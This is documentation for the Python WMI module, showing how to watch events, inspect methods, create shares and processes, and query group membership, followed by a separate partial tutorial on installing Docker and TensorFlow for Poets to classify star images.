you can use these watchers inside threads (of which more below) it might be easier in some cases to poll them with a timeout. If, for example, you wanted to monitor event log entries on two boxes without getting into threading and queues: import wmi def wmi_connection(server, username, password): print "attempting connection with", server if username: return wmi.WMI(server, user=username, password=password) else: return wmi.WMI(server) servers = [ (".", "", ""), ("goyle", "wmiuser", "secret") ] watchers = {} for server, username, password in servers: connection = wmi_connection(server, username, password) watchers[server] = connection.Win32_PrintJob.watch_for("creation") while True: for server, watcher in watchers.items(): try: event = watcher(timeout_ms=10) except wmi.x_wmi_timed_out: pass else: print "print job added on", server print event If you examine the keys of the .methods dictionary which every wrapped WMI class uses to cache its wrapped methods, you will see what methods are exposed: import wmi c = wmi.WMI() c.Win32_ComputerSystem.methods.keys() Each wrapped method produces its function signature as its repr or str. If a function such as .Shutdown requires additional privileges, this is also indicated: import wmi c = wmi.WMI() os = c.Win32_OperatingSystem for method_name in os.methods: method = getattr(os, method_name) print method Note that if a parameter is expected to be a list it will be suffixed with “[]”. Note also that the return values are always a tuple, albeit of length one. I was a bit surprised to come across this myself, but WMI tells you which Win32 API call is going on under the covers when you call a WMI method (not, unfortunately, for a property). This is exposed as a function wrapper’s .provenance attribute: import wmi c = wmi.WMI() print c.Win32_Process.Create.provenance WMI exposes a SpawnInstance_ method which is wrapped as the _wmi_object.new() method of the Python WMI classes. But you’ll use this method far less often than you think. If you want to create a new disk share, for example, rather than using Win32_Share.new, you’ll actually call the Win32_Share class’s Create method. In fact, most of the classes which allow instance creation via WMI offer a Create method (Win32_Process, Win32_Share etc.): import wmi c = wmi.WMI() result, = c.Win32_Share.Create(Path="c:\\temp", Name="temp", Type=0) if result == 0: print "Share created successfully" else: raise RuntimeError, "Problem creating share: %d" % result The times you will need to spawn a new instance are when you need to feed one WMI object with another created on the fly. Typical examples are passing security descriptors to new objects or process startup information to a new process. This example from MSDN can be translated into Python as follows: import wmi SW_SHOWNORMAL = 1 c = wmi.WMI() process_startup = c.Win32_ProcessStartup.new() process_startup.ShowWindow = SW_SHOWNORMAL # # could also be done: # process_startup = c.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL) process_id, result = c.Win32_Process.Create( CommandLine="notepad.exe", ProcessStartupInformation=process_startup ) if result == 0: print "Process started successfully: %d" % process_id else: raise RuntimeError, "Problem creating process: %d" % result Each class and object will return a readable version of its structure when rendered as a string: import wmi c = wmi.WMI() print c.Win32_OperatingSystem for os in c.Win32_OperatingSystem(): print os WMI objects occur within a hierarchy of classes. Each object knows its own ancestors: import wmi c = wmi.WMI() print c.Win32_Process.derivation() You can also look down the tree by finding all the subclasses of a named class, optionally filtering via a regex. To find all extrinsic event classes other than the builtin ones (indicated by a leading underscore): import wmi c = wmi.WMI() for extrinsic_event in c.subclasses_of("__ExtrinsicEvent", "[^_].*"): print extrinsic_event print " ", " < ".join(getattr(c, extrinsic_event).derivation()) The _wmi_object.__eq__() operator is overridden in wrapped WMI classes and calls the underlying .CompareTo method, so comparing two WMI objects for equality should do The Right Thing. Associators are classes which link together other classes. If, for example, you want to know what groups are on your system, and which users are in each group: import wmi c = wmi.WMI() for group in c.Win32_Group(): print group.Caption for user in group.associators(wmi_result_class="Win32_UserAccount"): print " ", user.Caption which can also be written in terms of the associator classes: import wmi c = wmi.WMI() for group in c.Win32_Group(): print group.Caption for user in group.associators("Win32_GroupUser"): print " ", user.Caption New in version 1.3.1: The _wmi_object.associators() method will convert its results to a _wmi_object. Thanks to a useful collaboration last summer with Paul Tiemann, the module was able to speed things up considerably if needed with a combination of caching and lightweight calls where needed. Not all of that is covered here, but the most straightforward improvements combine removing runtime introspection and caching so that wrappers are generated only on demand and can be pre-cached. The focus of the module originally, and still a large part of its use today, is in the interpreter. For that reason, when you instantiate a WMI namespace it looks for all the classes available in that namespace. But this takes quite a while on the larger namespaces and is unnecessary even on the smaller ones once you know what you’re after. In production code, therefore, you can turn this off: import wmi c = wmi.WMI(find_classes=False) If you need to determine which classes are available, you can still use the subclasses_of functionality described above to search, for example, for the performances classes available on a given machine at runtime: import wmi c = wmi.WMI(find_classes=False) perf_classes = c.subclasses_of("Win32_PerfRawData") Note From v1.4 onwards, the find_classes parameter is False by default: it has to be turned on specifically. But... the classes attribute now does a lazy lookup, so if you do call it directly or indirectly, eg by using IPython which invokes its attribute lookup magic method _wmi_object._getAttributes() it will return the full list of classes in the naeepsace. To avoid an initial lookup hit when a class is first queried or its method first called, it’s possible to push the class into the cache beforehand simply by referring to it. So, extending the code above: import wmi c = wmi.WMI(find_classes=False) for perf_class in c.subclasses_of("Win32_PerfRawData"): # do nothing, just get it into the cache getattr(c, perf_class) By default a WMI query will return all the fields of a class in each instance. By specifying the fields you’re interested in up-front as the first parameter of the query, you’ll avoid any expensive lookups. Although many fields represent static or cheap data, a few are calculated on the fly. This is especially true for performance or other realtime data in classes such as Win32_Process: import wmi c = wmi.WMI(find_classes=False) for i in c.Win32_Process(["Caption", "ProcessID"]): print i This is going to be a small section at the moment, more of a heads-up until I have a few more firm facts at my disposal. In short, the simplest way by far to access WMI functionality is to run as a Domain Admin user on an NT/AD domain. Other techniques are certainly possible, but if they stall at any point, you’re left ploughing through at least three layers of security, prodding hopefully at each one until you get a result or give up in disgust. The user in question has to have some kind of access to the machine whose WMI functionality is being invoked. This might either be by virtue of being included in the local Admin group or by specific access granted to a named user. WMI is a DCOM-based technology and so whatever rules apply to DCOM connections apply to WMI. If there’s a problem authenticating at the DCOM level then, in theory, you ought to have the same problem doing a DispatchEx on Word.Application. The program you want to look at is dcomcnfg.exe and that’s all I’ll say for now. WMI namespaces are system objects with their own ACLs. If you go to the WMI MMC snap-in (accessed via the Manage Computer interface) and access the properties for a namespace, there will be a security tab. The account using WMI functionality on the machine needs to have sufficient access via this security. WMI is a COM/DCOM-based mechanism so the rules which apply to COM-threading apply to WMI as well. This is true whether or not your program explicitly invokes Python threading: if you’re running in a service, for example, you’re probably threading whether you like it or not, since the service control manager seems to run the service control code in a different thread from the main service. Any COM code which wants to use threading must specify a threading model. There is much said out there on the subject but unless you have specific requirements you can normally get away with initializing COM threading before you instantiate a WMI object within a thread and then uninitializing afterwards:() New in version 1.4.1: From v1.4 onwards, the Moniker Syntax Error which usually results from failing to initialise threaded WMI access will be caught by the underlying code and a x_wmi_uninitialised_thread exception will be raised instead. See also Translations Authoritative Links Useful Examples Lists, Groups, etc.
http://svn.timgolden.me.uk/wmi/trunk/docs/_build/tutorial.html
crawl-003
refinedweb
3,594
56.55
table of contents - buster 4.16-2 - buster-backports 5.02-1~bpo10+1 - testing 5.03-1 - unstable 5.03-1 NAME¶posix_openpt - open a pseudoterminal device SYNOPSIS¶ #include <stdlib.h> #include <fcntl.h> int posix_openpt(int flags); Feature Test Macro Requirements for glibc (see feature_test_macros(7)): posix_openpt(): _XOPEN_SOURCE >= 600 DESCRIPTION¶The¶On success, posix_openpt() returns a nonnegative file descriptor which is the lowest numbered unused file descriptor. On failure, -1 is returned, and errno is set to indicate the error. ERRORS¶See open(2). VERSIONS¶Glibc support for posix_openpt() has been provided since version 2.2.1. ATTRIBUTES¶For an explanation of the terms used in this section, see attributes(7). CONFORMING TO¶POSIX.1-2001, POSIX.1-2008. posix_openpt() is part of the UNIX 98 pseudoterminal support (see pts(4)). NOTES¶Some older.
https://manpages.debian.org/buster-backports/manpages-dev/posix_openpt.3.en.html
CC-MAIN-2019-47
refinedweb
136
53.37
I’ m runing the code: import torch te_y = torch.ones([1,4,10]) # torch.Size([1, 4, 10]) operator = torch.tensor([[[1.0, -2.0, 1.0]]]) # torch.Size([1, 1, 3]) torch.nn.functional.conv1d(te_y, operator, padding=1, groups=4) get the error reporting with: Given groups=4, expected weight to be at least 4 at dimension 0, but got weight of size [1, 1, 3] instead But as the docs say: It should be no error. I want to preform the 1d conv in the each 4 in_channels with the same weight by set the groups as the 4.
https://discuss.pytorch.org/t/exceptional-behavior-when-parameter-groups-is-not-equal-to-1/154406
CC-MAIN-2022-27
refinedweb
102
71.75
I have a while loop, and I want it to keep running through for 15 minutes. it is currently: while True: #blah blah blah Try this: import time t_end = time.time() + 60 * 15 while time.time() < t_end: # do whatever you do This will run for 15 min x 60 s = 900 seconds. Function time.time returns the current time in seconds since 1st Jan 1970. The value is in floating point, so you can even use it with sub-second precision. In the beginning the value t_end is calculated to be "now" + 15 minutes. The loop will run until the current time exceeds this preset ending time.
https://codedump.io/share/9shXwOtWVBQW/1/python-loop-to-run-for-certain-amount-of-seconds
CC-MAIN-2019-26
refinedweb
107
83.76
SYNOPSIS #include <langinfo.h> char *nl_langinfo(nl_item item); DESCRIPTION The nl_langinfo() function provides access to locale information in a more flexible way than localeconv(3) does. char- acter encoding names, try "locale -m", cf. locale(1). D_T_FMT (LC_TIME) Return a string that can be used as a format string for strf- time(3) to represent time and date in a locale-specific way. D_FMT (LC_TIME) Return a string that can be used as a format string for strf- time(3) to represent a date in a locale-specific way. T_FMT (LC_TIME) Return a string that can be used as a format string for strf- time(3) to represent a time in a locale-specific way. DAY_{1-7} (LC_TIME) Return name of the n-th day of the week. [Warning: this follows the US convention DAY_1 = Sunday, not the international conven- tion dig- its). the value, or "." if the symbol should replace the radix charac- ter. The above list covers just some examples of items that can be requested. For a more detailed list, consult The GNU C Library Refer- ence Manual. RETURN VALUE If no locale has been selected for the appropriate category, nl_lang- info()). CONFORMING TO SUSv2, POSIX.1-2001. SEE ALSO locale(1), localeconv(3), setlocale(3), charsets(7), locale(7) The GNU C Library Reference Manual COLOPHON This page is part of release 3.23 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at.
http://www.linux-directory.com/man3/nl_langinfo.shtml
crawl-003
refinedweb
249
66.33
Encoding::GetChars Method (array<Byte>^) When overridden in a derived class, decodes all the bytes in the specified byte array into a set of characters. Assembly: mscorlib (in mscorlib.dll) Parameters - bytes - Type: array<System::Byte>^ The byte array containing the sequence of bytes to decode. Return ValueType: array. Note This method is intended to operate on Unicode characters, not on arbitrary binary data, such as byte arrays. If you need to encode arbitrary binary data into text,: Your app might need to decode multiple input bytes from a code page and process the bytes using multiple calls. In this case, you probably need your app app must convert a large amount of data, it should reuse the output buffer. In this case, the GetChars(array<Byte>^, Int32, Int32, array namespace System; using namespace System::Text; void PrintCountsAndChars( array<Byte>^bytes, Encoding^ enc ); int. array<Byte>^barrBE = gcnew array<Byte>(u32BE->GetByteCount( myStr )); u32BE->GetBytes( myStr, 0, myStr->Length, barrBE, 0 ); // Encode the string using the little-endian byte order. array<Byte>^barrLE = gcnew array ); } void PrintCountsAndChars( array<Byte>^bytes, Encoding^ enc ) { // Display the name of the encoding used. Console::Write( "{0,-25} :", enc ); // Display the exact character count. int iCC = enc->GetCharCount( bytes ); Console::Write( " {0,-3}", iCC ); // Display the maximum character count. int iMCC = enc->GetMaxCharCount( bytes->Length ); Console::Write( " {0,-3} :", iMCC ); // Decode the bytes and display the characters. array */ Available since 8 .NET Framework Available since 1.1 Portable Class Library Supported in: portable .NET platforms Silverlight Available since 2.0 Windows Phone Silverlight Available since 7.0 Windows Phone Available since 8.1
https://msdn.microsoft.com/en-us/library/khac988h.aspx?cs-save-lang=1&cs-lang=cpp
CC-MAIN-2017-22
refinedweb
268
50.53
Welcome to the Arbor Community! What are you working on? arbor.synapse('expsyn')but I cannot find a way. What I want is a small current input on the postsynaptic cell for each presynaptic spike, can any one point me in the right direction? Thanks! placea synapse and try to form a connection that ends on it? mpi4pyand it seems a bit overkill for unit tests to start with file locking etc if we can just pip install mpi4py contextis not readable from Python and the mpi_commhas no interface def _build_cat(name, path): from mpi4py.MPI import COMM_WORLD as comm build_err = None try: if not comm.Get_rank(): subprocess.run(["build-catalogue", name, str(path)], check=True) build_err = comm.bcast(build_err, root=0) except Exception as e: build_err = comm.bcast(e, root=0) if build_err: raise RuntimeError("Tests can't build catalogues") return Path.cwd() / (name + "-catalogue.so") PSA: Once arbor-sim/arbor#1693 is merged all Python unit tests must follow the unittest naming conventions: test_<my_test_file>.py Test<MyTestCase>(unittest.TestCase): test_<my_test_function> It's important that test files start with test_, test cases start with Test and test functions with test_ doc/internals? options.pycan also be burned now, right? Or is there still a use case for CLI args in the tests, not covered by the unittestCLI itself?
https://gitter.im/arbor-sim/community
CC-MAIN-2021-43
refinedweb
221
67.25
. package objets; public class Scanner { //class level variable static int paperCount = 1; //class level method static void Scan() { if (paperCount > 0) { paperCount = paperCount - 1; System.out.println("Document printed"); } else { System.out.println("catridge is out"); } } //instance level method void scanDoc() { print(); } package objects; public class ScannerTest { public static void main(String args[]) { Scanner p1 = new Scanner(); Scanner p2 = new Scanner(); // object level method p1.scanDoc(); p2.scanDoc(); } } Select all Open in new window Next you need to look at any other classes included in the code to understand them separately. Each of the other classes represent objects that have their own members and methods... so you have to understand them on their own. For example if you have a simple basic program that uses Integers and Strings... you first have to understand what an Integer is, and what a String is... or their use in main will not be understood. Once you understand your other classes (or objects) (like Integer / String in my simplified example)... then you can go back to main with a better understanding of the objects it creates and the things it does with those objects (methods). A part of understanding what a class does is being able to reference JavaDocs to understand the built in java classes. Any classes that you use that have javadoc documentation also have to be understood. Any part of the program that is unclear will only add to your overall confusion and frustration. So... I guess what I'm trying to say... is Step 1 : break it up into bite size pieces and fully understand how each piece works. Step 2 : step back and take a larger look at the whole program and understand how the peices work together. One other thing... sometimes what you are coding in has prerequisites. For example in this question you marked it as a Java question and a JSP question. JSP's basically write HTML pages... so in order to understand JSP's you not only have to understand Java, but you have to understand HTML. With JSP's you are sort of wrting code (java)... that writes it's own code (HTML).... so obviously the developer must have a solid grasp of both technologies... or none if it will make any sense. E.g. With code like this: public void B { } public static void main() { A() ; B() ; } public void C() { } public void A() { C() ; } You'd start with "main", see that it calls "A" - read that next. See that "A" calls C so read that next. Now you're done with C, so back to A. It doesn't call anything else, so back to "main". Next method in "main" is B, so read that next and so on. In this example you'd read the code in the order: "main" "A" "C" "B" (note this is very different from top to bottom or bottom to top). That way you are piecing together what the program does in the order it will do it. In this way you are reading the "story" of the code in the order it will run. Which is an order that should make sense. If you read top to bottom or anything else, it will be harder to understand as the code won't run in that order and may not make sense. Hope that helps, Doug With monday.com’s project management tool, you can see what everyone on your team is working in a single glance. Its intuitive dashboards are customizable, so you can create systems that work for you. If your code is calling 3rd party jar classes/methods then youshould be able to find Javadoc documentation for these that should explain in enough detail what the method is doing. If you encounter a method where there is no source code then you will just need to do your best to understand it from the docs (and what parameters it takes and returns, and it's name) and then proceed with the rest of the program. Doug If you cannot find the documentation for a jar file, and you have no idea what it's purpose is, then you probably shouldn't be using it anyway. Some jar files are compiled to protect the author's source code. If you have legitimate access to the jar file, then you will be given or have available to you... the necessary documentation to use it correctly. There's more on how to do that here: But this should only be used when you really need to delve into the details of how a library works. For most libraries, you should be fine to just read the documentation and work with that alone (and ignore the source). If you aren't sure where these major entry points are, you should ask somebody else who is already familiar with the code to help you find them. Doug Since object oriented programming all about creating objects and invoking. For example Open in new window Draw picture as attached Rectangle Class with class level variables, methods.(something like objects interaction diagram how they objects communicates with each other let us say 10 of the objects in the application?) Draw two eclipses for scanner instances p1, p2 with instance level methods may be from then join to other class method wherever call leads to? Please advise ObjectInstancDiagram.jpg Sometimes drawing it out can help you get your head around it. I think as you gain experience in Java... that reviewing javadocs will provide enough information and confidence to use new java classes. The more complex classes usually include example usage... so that helps too.
https://www.experts-exchange.com/questions/28369114/How-to-read-a-java-program.html
CC-MAIN-2018-09
refinedweb
942
72.46
The starting point for developing a web service to use WSIT is a Java class file annotated with the javax.jws.WebService annotation. The WebService annotation defines the class as a web service endpoint. The following Java code shows a web service. The IDE will create most of this Java code for you. package org.me.calculator; import javax.jws.WebService; import javax.jws.WebMethod; import javax.jws.WebParam; @WebService() public class Calculator { @WebMethod(action="sample_operation") public String operation(@WebParam(name="param_name") String param) { // implement the web service operation here return param; } @WebMethod(action="add") public int add(@WebParam(name = "i") int i, @WebParam(name = "j") int j) { int k = i + j; return k; } } Notice that this web service performs a very simple operation. It takes two integers, adds them, and returns the result. Perform the following steps to use the IDE to create this web service. Click the Runtime tab in the left pane and verify that GlassFish is listed in the left pane. If it is not listed, register it by following the steps in Registering GlassFish with the IDE. Choose File->New Project, select Web Application from the Web category, and click Next. Assign the project a name that is representative of services that will be provided by the web service (for example, CalculatorApplication), set the Project Location to the location of the Sun application server, and click Finish. When you create the web service project, be sure to define a Project Location that does not include spaces in the directory name. Spaces in the directory might cause the web service and web service clients to fail to build and deploy properly. To avoid this problem, Sun recommends that you create a directory, for example C:\work, and put your project there. Right-click the CalculatorApplication node and choose New->Web Service. Type the web service name (CalculatorWS) and the package name (org.me.calculator) in the Web Service Name and the Package fields respectively. Select Create an Empty Web Service and click Finish. The IDE then creates a skeleton CalculatorWS.java file for the web service that includes an empty WebService class with annotation @Webservice. Right-click within the body of the class and choose Web Service->Add Operation. In the upper part of the Add Operation dialog box, type add in Name and choose int from the Return Type drop-down list. In the lower part of the Add Operation dialog box, click Add and create a parameter of type int named i. Click OK. Click Add again and create a parameter of type int called j. Click OK and close the Enter Method Parameter dialog box. Click OK at the bottom of the Add Operation dialog box. Notice that the add method has been added to the Source Editor: @WebMethod public int add(@WebParam(name = "i") int i, @WebParam(name = "j") int j) { // TODO implement operation return 0; } Change the add method to the following (changes are in bold): @WebMethod(action="add") public int add(@WebParam(name = "i") int i, @WebParam(name = "j") int j) { int k = i + j; return k; } To ensure interoperability with Windows Communication Foundation (WCF) clients, you must specify the action element of @WebMethod in your endpoint implementation classes. WCF clients will incorrectly generate an empty string for the Action header if you do not specify the action element. Save the CalculatorWS.java file.
http://docs.oracle.com/cd/E19159-01/820-1072/ahibp/index.html
CC-MAIN-2015-22
refinedweb
564
54.83
“Strategies? Will you talk about Bazel’s strategy for world domination 🙀?” No… not exactly that. Dynamic execution has been quite a hot topic in my work over the last few months and I am getting ready to publish a series of posts on it soon. But before I do that, I need to first review Bazel’s execution strategies because they play a big role in understanding what dynamic execution is and how it’s implemented. Simply put, strategies are Bazel’s abstraction over the mechanism to run a subprocess as part of an action (think compiler invocation). In essence, they are a glorified exec() system call in Unix or CreateProcess in Windows and supercharge them to run subprocesses under very different environments. The invariant, however, is that strategies do not affect the semantics of the execution: that is, running the same command line on strategy A and strategy B must yield the same output files. As a consequence, changing strategies does not invalidate the analysis graph. Because of the previous invariant, we can mix and match strategies at run time without affecting the output behavior. This is exposed via the repeated --strategy flag, which takes arguments of the form [mnemonic]=strategy. With this flag, you can tell Bazel to run certain classes of actions under a specific strategy. For example, you might say --strategy=remote --strategy=Javac=worker to set the default strategy to remote and to override it with worker for Java compiles alone. There also is the --strategy_regexp flag to select strategies based on action messages, but I’ll leave the “magic” of that aside. And there is also some fancy support for automatic strategy selection. Regarding implementation, all strategies are classes that implement the SpawnActionContext interface. Overly simplifying, they must provide an exec() method that takes a Spawn (essentially a command line description) and returns a collection of SpawnResults. Why a collection? Because a strategy may implement retries, and their failed results are exposed as part of the return value. Looking further into their implementation, strategies wrap a SpawnRunner, which is the thing that actually knows how to run a spawn. You will notice that this interface’s exec() returns a single SpawnResult, which helps understand how the strategy and its spawn runner relate: the strategy contains higher-level logic around the spawn runner and the spawn runner is in charge of the execution details. With that, let’s now review the primary strategies in Bazel. The standalone strategy The standalone (aka local) strategy is the simplest you can have, and is a good starting point to learn more about the internals of strategies and process execution in Bazel. This strategy executes spawns directly on the output tree. That is: the commands are run with a current working directory that resides inside the output tree and all file references are within that directory. There are no restrictions on what the process can do, so the process can inadvertently have side-effects on unrelated files. This strategy is at StandaloneSpawnStrategy and uses the LocalSpawnRunner. The sandboxed strategy The sandboxed strategy exists to support Bazel’s promise of correct builds and is the default strategy for any local action (which means all actions unless you are doing any customization). This strategy runs each spawn under a controlled environment that is isolated from the output tree and that is prevented from interacting with the system in certain ways (e.g. no networking access). During an exec(), the sandbox strategy performs these steps: - Create a directory outside of the output tree that exclusively contains the inputs required by the spawn as read-only files. This is currently done in the form of a symlink forest. - Execute the spawn under that separate directory, using system-specific technologies like namespaces on Linux and sandbox-execon macOS to constrain what the process can do. - Move the outputs out of the sandbox and into the output tree. - Delete the sandbox. This approach works… but can have a significant penalty on action execution performance. This has been a pet peeve of mine and I’ve been trying to improve it for a long time with sandboxfs, though I haven’t gotten to major breakthroughs just yet. This strategy is implemented as one class per supported operating system and all of them live under the sandbox subdirectory. The worker strategy The worker strategy exists to speed up the edit/build/test cycle of languages whose compiler is costly to start or whose compiler keeps state around to optimize incremental builds. The strategy communicates with a long-lived persistent worker process and essentially sends the command lines to execute to that separate process. For example: in the case of Java, the persistent worker avoids the penalty of JVM startup and JIT warmup times; and in the case of Dart, the persistent worker allows the compiler to keep file state in memory so that subsequent compilations are much faster. The risk of allowing workers is that they can introduce correctness issues more easily than the typical startup/shutdown process: any bugs while processing an action, which may be harmless if the compiler is shut down immediately afterwards, can have cascading effects if the compiler is kept around for a long time and reused for other files. (Yes, we have hit these kind of issues in e.g. the Swift worker.) Additionally, worker management in Bazel is currently very rudimentary so blindly enabling workers can make your machine melt due to memory pressure. We have plans to improve this significantly but haven’t gotten to them just yet. This strategy is at WorkerSpawnStrategy and uses the WorkerSpawnRunner. The remote strategy The remote strategy is the crown jewel of Bazel. This strategy is what allows Bazel to execute processes on remote machines thus letting your project break loose of the constraints of a single machine’s build power. This is the most complex strategy of all if only because of the need to coordinate with remote machines over gRPC, having to multiplex requests, and having to deal with networking hiccups. I will not dive into any of its details here. This strategy is at RemoteSpawnStrategy and uses the RemoteSpawnRunner. That’s all for today. In the coming posts, I’ll cover dynamic execution in detail and will likely refer to this post in multiple occasions. Be aware, however, that a lot of the details on how strategies are defined and registered in Bazel are about to change as part of the ongoing Platforms & Toolchains work. The specifics behind strategy implementation should not change, though.
https://jmmv.dev/2019/12/bazel-strategies.html
CC-MAIN-2022-21
refinedweb
1,094
51.78
Adding libs (QT += ...) didn't work Hello. I have a problem with adding new libs to project. I try add "xml" to QT += core, but that didn't work. Nothing changes. My workspace: Qt 5.3 MinGW 32bit (auto-detected) MinGW 4.8.2 32bit (auto-detected) How can i add new libraries? I try various options, but it failed to. Please help Jareq000 Screen: !! hii Add QT += xml Hi, You should add the contents of your .pro file as well, since that is where the relevant items is located. And instead of a screenshot, please just add the text in a code tag. That's my .pro file: @TEMPLATE = app CONFIG += console CONFIG -= app_bundle CONFIG -= qt SOURCES += main.cpp QT += core QT += xml INCLUDEPATH += C:/Qt/Qt5.3.1/5.3/mingw482_32/include @ and that didn't work. I think, that QT can't find the libraries. I tried to add them, but it didn't work. Where can I check if everything is ok? Did you run qmake after you modified the .pro file? If not, run qmake (you can find it in Build menu in Creator) and after that the linker should find the xml module libraries. And also the include should work without the module name: @ #include <QFile> #include <QDomDocument> //... @ Yes, i run qmake. If I include this line, Qt warns: @ error: QFile: No such file or directory #include <QFile>@ Why do you have @CONFIG -= qt@ in your pro file?Remove that line and try again. It work's! :D @CONFIG -= qt@ was added automatically, but why? Thanks for replies. Maybe you chose a "non qt" application when you created the project. Yes, I choose. Now I understand. Thank You. hi that's really great .. Please marked thread title as SOLVED so other members can seem it as solved.
https://forum.qt.io/topic/43899/adding-libs-qt-didn-t-work
CC-MAIN-2017-34
refinedweb
303
87.72
This chapter provides an overview of developing search applications in MarkLogic Server, and includes the following sections: MarkLogic Server includes rich full-text search features. All of the search features are implemented as extension functions available in XQuery, and most of them are also available through the REST and Java interfaces. This section provides a brief overview some of the main search features in MarkLogic Server and includes the following parts: MarkLogic Server Server provides search features through a set of layered APIs that support multiple programming languages. The following diagram illustrates the layering of the MarkLogic search APIs. These APIs are extensible and work in a large number of applications. The core text search foundation in MarkLogic Server is the cts API, a set of built-in XQuery functions in the cts namespace that perform full-text search. These capabilities are also available in Server-Side Javascript as functions with a cts. prefix. The APIs above the cts foundation provide a higher level of abstraction that enables rapid development of search applications using XQuery, Server-Side JavaScript, Java, Node.js, or any programming language with support for making HTTP requests. For example, the XQuery Search API leverages functions such as cts:search, cts:word-query, and cts:element-value-query internally. The Search API, jsearch API, and the Client APIs are sufficient for most applications. Use the cts built-ins for advanced application features, such as creating alerting applications with reverse queries or creating content classifiers. The higher level APIs offer benefits such as the following: You can use more than one of these APIs in an application. For example, a Java application can include an XQuery or Server-Side JavaScript extension to perform custom search result transformations on the server. Similarly, an XQuery application can call both search:* and cts:* functions. Each of the APIs described in APIs for Multiple Programming Languages enables you to perform fine-grained searches. The cts:search function returns raw results as a sequence of matching nodes. The Search, REST, Node.js and Java APIs accept more abstract query styles such as string and structured queries, and return results either in report form, as an XML search:response (or equivalent JSON structure) or matching documents. The customizable search:response can include details such as snippets with highlighting of matching terms and query metrics. The REST and Java APIs can also return the results report as JSON. The following diagram summarizes the query styles and results formats each API provides for searching content and metadata: The following table provides a brief description of each query style. The level of complexity of query construction increases as you read down the table. A query encapsulates your search criteria. When you search for documents matching a query, your criteria fall into one or more of the query types described in this section, no matter what query style you use (string, structured, QBE, etc.). The following query types are basic search building blocks that describe the content you want to match. Additional query types enable you to build up complex queries by combining the basic content queries with each other and with criteria that add additional constraints. The additional query types fall into the following categories. The CTS API includes query constructors for all the above query types, such as cts:*-range-query, cts:*-value-query, cts:*-word-query, cts:and-query, cts:collection-query, and cts:near-query. For details, see Composing cts:query Expressions. With no additional configuration, string queries support term queries and logical composers. For example, the query string cat AND dog is implicitly two term queries, joined by an and logical composer. However, you can easily extend the expressive power of a string query using constraint bindings to enable additional query types. For example, if you use a range constraint binding to tie the identifier cost to a specific indexed JSON property, you enable string queries of the form cost GT 10. For details, see Searching Using String Queries. In a QBE, content matches are value queries by default. For example, a QBE search criteria of the form {'my-key': 'desired-value'} is implicitly a value query for the JSON property 'my-key' whose value is exactly 'desired-value'. However, the QBE syntax includes special property names that enable you to construct other types of query. For example, use $word to create a word query instead of a value query: {'my-key': {'$word': 'desired-value'}}. For details, see Searching Using Query By Example. Structured query includes components that encompass all the query types, such as value-query, range-query, term-query, and-query, and directory-query. Some of the Client APIs include a structured query builder interface to assist you with structured query composition. For details, see Searching Using Structured Queries. MarkLogic Server implements the XQuery language, which includes XPath 2.0. XPath expressions are searches which can search XML. MarkLogic Server extends XPath so that you can also use it to address JSON content. For details, see Traversing JSON Documents Using XPath in the Application Developer's Guide. MarkLogic Server enables you to define range indexes which index XML structures such as elements, element attributes; XPath expressions; and JSON properties. You can also define range indexes over geospatial values. Each of these range indexes has lexicon APIs associated with them. The lexicon APIs enable you to return values directly from the indexes. Lexicons are very useful in constructing facets and in finding fast counts of XML element, XML attribute, and JSON property values. The Search API and Node.js, Java, and REST Client APIs makes extensive use of the lexicon features. For details about lexicons, see Browsing With Lexicons. MarkLogic Server search supports a wide range of full-text features. These features include stemming, wildcarded searches, diacritic-sensitive/insensitive searches, case-sensitive/insensitive searches, spelling correction functions, thesaurus functions, geospatial searches, advanced language and collation support, and much more. These features are all designed to build off of each other and work together in an extensible and flexible way.. The MarkLogic XQuery and XSLT Function Reference contains the XQuery function signatures and descriptions, as well as many code examples. This Search Developer's Guide contains descriptions and technical details about the search features in MarkLogic Server, including: For other information about developing applications in MarkLogic Server, see the Application Developer's Guide. For information about XQuery in MarkLogic Server, see the XQuery and XSLT Reference Guide.
https://docs.marklogic.com/guide/search-dev/searchdev
CC-MAIN-2022-27
refinedweb
1,074
54.52
Recognize Stars and Planets Using Your Mac / Linux Computer and a Raspberry Pi: Intro to Machine Learning Introduction: Recognize Stars and Planets Using Your Mac / Linux Computer and a Raspberry Pi: Intro to Machine Learning Hi, thank you for reading this post! Since I was a small child, I've been obsessed with technology and space. But the computers were still too weak to simulate instruments that are used nowadays (I'm 13 years old btw). But now, computers are much faster and better. So when I found out that there was software that could recognize images and was programmable, I immediately thought of this project. In this project we'll use a Mac or a Linux computer. Windows computers are sadly not supported by this framework, but you could try this:... . For this project you'll need: - A Mac / Linux computer For the bonus part with the Raspberry Pi you'll need - A Raspberry Pi (I used the second model) ( ) - The official Raspberry Pi camera board ( ) - A breadboard ( ) - A button ( ) - A telescope Step 1: What Is TensorFlow for Poets? In this project, we will be using Tensorflow for poets. This is opensource software, made by Google to use Deep Machine Learning on images. Basically, Deep Machine Learning is teaching the computer to recognize certain things. If you want to learn more about Machine Learning, you can watch this series made by Google:. Tensorflow for poets is build upon a framework called Inception. Inception was already "trained" by Google to recognize images like dalmatians and dishwashers, but using Tensorflow for poets we can retrain it to recognize pictures of stars and planets. Step 2: Setting Up Docker To download Tensorflow for poets, you will need to install Docker first. If you're using a Mac system, continue to step 3 for the installation. If you're using a linux bistro: select your bistro on and follow the steps. If you're done with that, go to step 4. Step 3: Setting Up Docker on OS X First, go to and download the package for OS X. If the .pkg file is completely downloaded, click on it and go through the installation process. If the installation has ended. Go to launchpad, select Docker Quickstart Terminal and run docker run hello-world This should show you if Docker is installed (See in the image above). Step 4: Installing Tensorflow for Poets Start Docker and run the following command: docker run -it gcr.io/tensorflow/tensorflow:latest-devel This will take a while to install. When it's done, you'll see "root@xxxxxxx#" in front of your command line. This is normal. Now try running python and using the following CODE in python: To start python run: python Then you will see something like this: Python 3.5.2 |Anaconda 4.1.1 (x86_64)| (default, Jul 2 2016, 17:52:12) [GCC 4.2.1 Compatible Apple LLVM 4.2 (clang-425.0.28)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> Now copy and paste this code into it: import tensorflow as tf hello = tf.constant('Hello, TensorFlow!') sess = tf.Session() print(sess.run(hello)) If you see "Hello, Tensorflow" it works Step 5: Downloading and Testing the Software Now, we need to download some images. Download the .zip file in the under this text and unzip this inside your homefolder. Now open the docker terminal and run docker run -it -v $HOME/SpaceImages:/SpaceImages gcr.io/tensorflow/tensorflow:latest-devel And cd /tensorflow git pull #you only have to run this the first time Now try download some image from the internet and place them inside the "test" folder. The image has to be a jpg type of image. Now run the following code to test the recognition: python 